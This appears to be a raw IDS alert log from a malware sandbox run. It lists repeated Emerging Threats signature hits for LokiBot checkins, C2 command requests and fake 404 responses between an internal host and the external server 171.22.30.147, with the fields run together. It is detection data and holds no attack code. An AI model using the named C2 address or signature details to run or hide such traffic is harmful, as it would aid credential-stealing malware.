              192.168.2.3171.22.30.14750044802024313 01/05/23-08:53:53.227481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498672025483 01/05/23-08:53:00.853652TCP2025483ET TROJAN LokiBot Fake 404 Response8049867171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497032025483 01/05/23-08:52:08.643965TCP2025483ET TROJAN LokiBot Fake 404 Response8049703171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499982025483 01/05/23-08:53:39.543765TCP2025483ET TROJAN LokiBot Fake 404 Response8049998171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750017802825766 01/05/23-08:53:44.537455TCP2825766ETPRO TROJAN LokiBot Checkin M25001780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749787802024313 01/05/23-08:52:37.509502TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749876802024318 01/05/23-08:53:03.175112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498452025483 01/05/23-08:52:54.928267TCP2025483ET TROJAN LokiBot Fake 404 Response8049845171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749787802024318 01/05/23-08:52:37.509502TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750071802025381 01/05/23-08:54:00.426977TCP2025381ET TROJAN LokiBot Checkin5007180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749876802024313 01/05/23-08:53:03.175112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500492025483 01/05/23-08:53:54.623365TCP2025483ET TROJAN LokiBot Fake 404 Response8050049171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749878802825766 01/05/23-08:53:03.704233TCP2825766ETPRO TROJAN LokiBot Checkin M24987880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749976802825766 01/05/23-08:53:33.629058TCP2825766ETPRO TROJAN LokiBot Checkin M24997680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749783802825766 01/05/23-08:52:36.372208TCP2825766ETPRO TROJAN LokiBot Checkin M24978380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749915802825766 01/05/23-08:53:15.112176TCP2825766ETPRO TROJAN LokiBot Checkin M24991580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749709802025381 01/05/23-08:52:11.256691TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749922802024313 01/05/23-08:53:17.061545TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750040802025381 01/05/23-08:53:52.135869TCP2025381ET TROJAN LokiBot Checkin5004080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750083802825766 01/05/23-08:54:03.789158TCP2825766ETPRO TROJAN LokiBot Checkin M25008380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750037802025381 01/05/23-08:53:51.314352TCP2025381ET TROJAN LokiBot Checkin5003780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498952025483 01/05/23-08:53:08.453954TCP2025483ET TROJAN LokiBot Fake 404 Response8049895171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749759802024313 01/05/23-08:52:28.024665TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497592025483 01/05/23-08:52:28.116411TCP2025483ET TROJAN LokiBot Fake 404 Response8049759171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749721802024318 01/05/23-08:52:17.231128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749756802021641 01/05/23-08:52:27.231494TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749999802025381 01/05/23-08:53:39.715844TCP2025381ET TROJAN LokiBot Checkin4999980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749816802024318 01/05/23-08:52:45.483412TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749911802021641 01/05/23-08:53:14.014731TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749721802024313 01/05/23-08:52:17.231128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749941802025381 01/05/23-08:53:22.165125TCP2025381ET TROJAN LokiBot Checkin4994180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749779802024318 01/05/23-08:52:35.235559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749874802021641 01/05/23-08:53:02.624496TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749790802024318 01/05/23-08:52:38.345416TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749798802025381 01/05/23-08:52:40.547899TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749885802024318 01/05/23-08:53:05.575803TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749980802021641 01/05/23-08:53:34.702395TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749790802024313 01/05/23-08:52:38.345416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749835802025381 01/05/23-08:52:50.902278TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749922802024318 01/05/23-08:53:17.061545TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750018802024318 01/05/23-08:53:44.999195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749885802024313 01/05/23-08:53:05.575803TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750014802825766 01/05/23-08:53:43.719267TCP2825766ETPRO TROJAN LokiBot Checkin M25001480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749740802025381 01/05/23-08:52:22.636691TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749881802825766 01/05/23-08:53:04.500331TCP2825766ETPRO TROJAN LokiBot Checkin M24988180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750018802024313 01/05/23-08:53:44.999195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749997802021641 01/05/23-08:53:39.208772TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749720802025381 01/05/23-08:52:16.949813TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498202025483 01/05/23-08:52:46.639144TCP2025483ET TROJAN LokiBot Fake 404 Response8049820171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749991802024318 01/05/23-08:53:37.629731TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749763802825766 01/05/23-08:52:29.176849TCP2825766ETPRO TROJAN LokiBot Checkin M24976380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498612025483 01/05/23-08:52:59.232281TCP2025483ET TROJAN LokiBot Fake 404 Response8049861171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749991802024313 01/05/23-08:53:37.629731TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750017802025381 01/05/23-08:53:44.537455TCP2025381ET TROJAN LokiBot Checkin5001780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749907802825766 01/05/23-08:53:12.956728TCP2825766ETPRO TROJAN LokiBot Checkin M24990780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749957802021641 01/05/23-08:53:26.768134TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749809802825766 01/05/23-08:52:43.596832TCP2825766ETPRO TROJAN LokiBot Checkin M24980980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499162025483 01/05/23-08:53:15.457182TCP2025483ET TROJAN LokiBot Fake 404 Response8049916171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749800802825766 01/05/23-08:52:41.099242TCP2825766ETPRO TROJAN LokiBot Checkin M24980080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749701802024318 01/05/23-08:52:07.731855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749813802021641 01/05/23-08:52:44.686594TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749701802024313 01/05/23-08:52:07.731855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498992025483 01/05/23-08:53:10.249229TCP2025483ET TROJAN LokiBot Fake 404 Response8049899171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750067802024313 01/05/23-08:53:59.373237TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750022802825766 01/05/23-08:53:46.665385TCP2825766ETPRO TROJAN LokiBot Checkin M25002280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749836802024318 01/05/23-08:52:51.681664TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749776802021641 01/05/23-08:52:33.619524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749805802021641 01/05/23-08:52:42.467353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749799802024313 01/05/23-08:52:40.836883TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749960802021641 01/05/23-08:53:28.475539TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749799802024318 01/05/23-08:52:40.836883TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498582025483 01/05/23-08:52:58.421210TCP2025483ET TROJAN LokiBot Fake 404 Response8049858171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749984802825766 01/05/23-08:53:35.743967TCP2825766ETPRO TROJAN LokiBot Checkin M24998480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749933802025381 01/05/23-08:53:20.043516TCP2025381ET TROJAN LokiBot Checkin4993380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749770802024318 01/05/23-08:52:31.112136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749882802021641 01/05/23-08:53:04.789158TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749855802025381 01/05/23-08:52:57.514506TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749942802024318 01/05/23-08:53:22.441601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749942802024313 01/05/23-08:53:22.441601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749770802024313 01/05/23-08:52:31.112136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498362025483 01/05/23-08:52:51.771164TCP2025483ET TROJAN LokiBot Fake 404 Response8049836171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749979802025381 01/05/23-08:53:34.430839TCP2025381ET TROJAN LokiBot Checkin4997980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749752802025381 01/05/23-08:52:26.039085TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749795802825766 01/05/23-08:52:39.717554TCP2825766ETPRO TROJAN LokiBot Checkin M24979580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749749802025381 01/05/23-08:52:25.162571TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749989802021641 01/05/23-08:53:37.099082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749836802024313 01/05/23-08:52:51.681664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750071802825766 01/05/23-08:54:00.426977TCP2825766ETPRO TROJAN LokiBot Checkin M25007180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749838802825766 01/05/23-08:52:52.824149TCP2825766ETPRO TROJAN LokiBot Checkin M24983880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497782025483 01/05/23-08:52:35.041705TCP2025483ET TROJAN LokiBot Fake 404 Response8049778171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749747802024313 01/05/23-08:52:24.577114TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749829802825766 01/05/23-08:52:49.001962TCP2825766ETPRO TROJAN LokiBot Checkin M24982980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749927802825766 01/05/23-08:53:18.426652TCP2825766ETPRO TROJAN LokiBot Checkin M24992780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497402025483 01/05/23-08:52:22.715646TCP2025483ET TROJAN LokiBot Fake 404 Response8049740171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749990802025381 01/05/23-08:53:37.383838TCP2025381ET TROJAN LokiBot Checkin4999080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750058802024318 01/05/23-08:53:57.002594TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749750802024318 01/05/23-08:52:25.450968TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750002802825766 01/05/23-08:53:40.505314TCP2825766ETPRO TROJAN LokiBot Checkin M25000280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749825802021641 01/05/23-08:52:47.903129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750061802024313 01/05/23-08:53:57.824423TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750058802024313 01/05/23-08:53:57.002594TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749736802021641 01/05/23-08:52:21.543284TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497372025483 01/05/23-08:52:21.896475TCP2025483ET TROJAN LokiBot Fake 404 Response8049737171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750061802024318 01/05/23-08:53:57.824423TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498772025483 01/05/23-08:53:03.510914TCP2025483ET TROJAN LokiBot Fake 404 Response8049877171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749726802825766 01/05/23-08:52:18.702884TCP2825766ETPRO TROJAN LokiBot Checkin M24972680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749750802024313 01/05/23-08:52:25.450968TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749707802021641 01/05/23-08:52:10.342729TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749796802021641 01/05/23-08:52:39.986568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749864802025381 01/05/23-08:52:59.960618TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749767802024313 01/05/23-08:52:30.299348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749856802024318 01/05/23-08:52:57.793570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749951802021641 01/05/23-08:53:24.927407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749959802025381 01/05/23-08:53:28.075379TCP2025381ET TROJAN LokiBot Checkin4995980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749862802021641 01/05/23-08:52:59.436708TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500372025483 01/05/23-08:53:51.398803TCP2025483ET TROJAN LokiBot Fake 404 Response8050037171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749767802024318 01/05/23-08:52:30.299348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749898802825766 01/05/23-08:53:09.845609TCP2825766ETPRO TROJAN LokiBot Checkin M24989880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749964802825766 01/05/23-08:53:30.400374TCP2825766ETPRO TROJAN LokiBot Checkin M24996480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749953802025381 01/05/23-08:53:25.469204TCP2025381ET TROJAN LokiBot Checkin4995380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500152025483 01/05/23-08:53:44.078205TCP2025483ET TROJAN LokiBot Fake 404 Response8050015171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499912025483 01/05/23-08:53:37.704453TCP2025483ET TROJAN LokiBot Fake 404 Response8049991171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499942025483 01/05/23-08:53:38.493200TCP2025483ET TROJAN LokiBot Fake 404 Response8049994171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750057802025381 01/05/23-08:53:56.743180TCP2025381ET TROJAN LokiBot Checkin5005780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498052025483 01/05/23-08:52:42.560455TCP2025483ET TROJAN LokiBot Fake 404 Response8049805171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750060802025381 01/05/23-08:53:57.543966TCP2025381ET TROJAN LokiBot Checkin5006080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749948802024313 01/05/23-08:53:24.079081TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749714802825766 01/05/23-08:52:13.349412TCP2825766ETPRO TROJAN LokiBot Checkin M24971480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749710802021641 01/05/23-08:52:11.662757TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749779802024313 01/05/23-08:52:35.235559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749723802825766 01/05/23-08:52:17.811814TCP2825766ETPRO TROJAN LokiBot Checkin M24972380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749908802021641 01/05/23-08:53:13.214132TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749812802825766 01/05/23-08:52:44.412618TCP2825766ETPRO TROJAN LokiBot Checkin M24981280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750055802024313 01/05/23-08:53:56.183544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750034802825766 01/05/23-08:53:50.478539TCP2825766ETPRO TROJAN LokiBot Checkin M25003480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497622025483 01/05/23-08:52:28.957388TCP2025483ET TROJAN LokiBot Fake 404 Response8049762171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497432025483 01/05/23-08:52:23.546435TCP2025483ET TROJAN LokiBot Fake 404 Response8049743171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749917802021641 01/05/23-08:53:15.635846TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497842025483 01/05/23-08:52:36.757244TCP2025483ET TROJAN LokiBot Fake 404 Response8049784171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499502025483 01/05/23-08:53:24.713779TCP2025483ET TROJAN LokiBot Fake 404 Response8049950171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497212025483 01/05/23-08:52:17.311222TCP2025483ET TROJAN LokiBot Fake 404 Response8049721171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749865802024313 01/05/23-08:53:00.234414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749867802025381 01/05/23-08:53:00.773467TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749954802024318 01/05/23-08:53:25.726692TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749894802021641 01/05/23-08:53:08.006895TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749741802024313 01/05/23-08:52:22.916909TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749954802024313 01/05/23-08:53:25.726692TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749948802024318 01/05/23-08:53:24.079081TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750015802021641 01/05/23-08:53:43.993137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749778802025381 01/05/23-08:52:34.958959TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749865802024318 01/05/23-08:53:00.234414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749741802024318 01/05/23-08:52:22.916909TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749977802021641 01/05/23-08:53:33.899852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749996802825766 01/05/23-08:53:38.933239TCP2825766ETPRO TROJAN LokiBot Checkin M24999680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499722025483 01/05/23-08:53:32.654908TCP2025483ET TROJAN LokiBot Fake 404 Response8049972171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749921802025381 01/05/23-08:53:16.794242TCP2025381ET TROJAN LokiBot Checkin4992180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498142025483 01/05/23-08:52:45.034058TCP2025483ET TROJAN LokiBot Fake 404 Response8049814171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749703802025381 01/05/23-08:52:08.565296TCP2025381ET TROJAN LokiBot Checkin4970380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750031802025381 01/05/23-08:53:49.661487TCP2025381ET TROJAN LokiBot Checkin5003180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749967802825766 01/05/23-08:53:31.230819TCP2825766ETPRO TROJAN LokiBot Checkin M24996780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749789802825766 01/05/23-08:52:38.076275TCP2825766ETPRO TROJAN LokiBot Checkin M24978980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750012802024318 01/05/23-08:53:43.190304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749928802024318 01/05/23-08:53:18.678448TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499412025483 01/05/23-08:53:22.247388TCP2025483ET TROJAN LokiBot Fake 404 Response8049941171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750074802825766 01/05/23-08:54:01.233569TCP2825766ETPRO TROJAN LokiBot Checkin M25007480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749928802024313 01/05/23-08:53:18.678448TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749924802825766 01/05/23-08:53:17.587003TCP2825766ETPRO TROJAN LokiBot Checkin M24992480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749727802024318 01/05/23-08:52:18.985108TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497562025483 01/05/23-08:52:27.312696TCP2025483ET TROJAN LokiBot Fake 404 Response8049756171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498922025483 01/05/23-08:53:07.550899TCP2025483ET TROJAN LokiBot Fake 404 Response8049892171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749746802825766 01/05/23-08:52:24.299560TCP2825766ETPRO TROJAN LokiBot Checkin M24974680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497282025483 01/05/23-08:52:19.353553TCP2025483ET TROJAN LokiBot Fake 404 Response8049728171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749822802021641 01/05/23-08:52:47.112264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750055802024318 01/05/23-08:53:56.183544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750031802825766 01/05/23-08:53:49.661487TCP2825766ETPRO TROJAN LokiBot Checkin M25003180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749970802025381 01/05/23-08:53:32.043326TCP2025381ET TROJAN LokiBot Checkin4997080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750035802024313 01/05/23-08:53:50.741604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749993802025381 01/05/23-08:53:38.145026TCP2025381ET TROJAN LokiBot Checkin4999380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749845802021641 01/05/23-08:52:54.838950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749707802024318 01/05/23-08:52:10.342729TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749810802024313 01/05/23-08:52:43.863274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749707802024313 01/05/23-08:52:10.342729TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749810802024318 01/05/23-08:52:43.863274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749750802021641 01/05/23-08:52:25.450968TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749792802025381 01/05/23-08:52:38.887901TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.3171.22.30.147
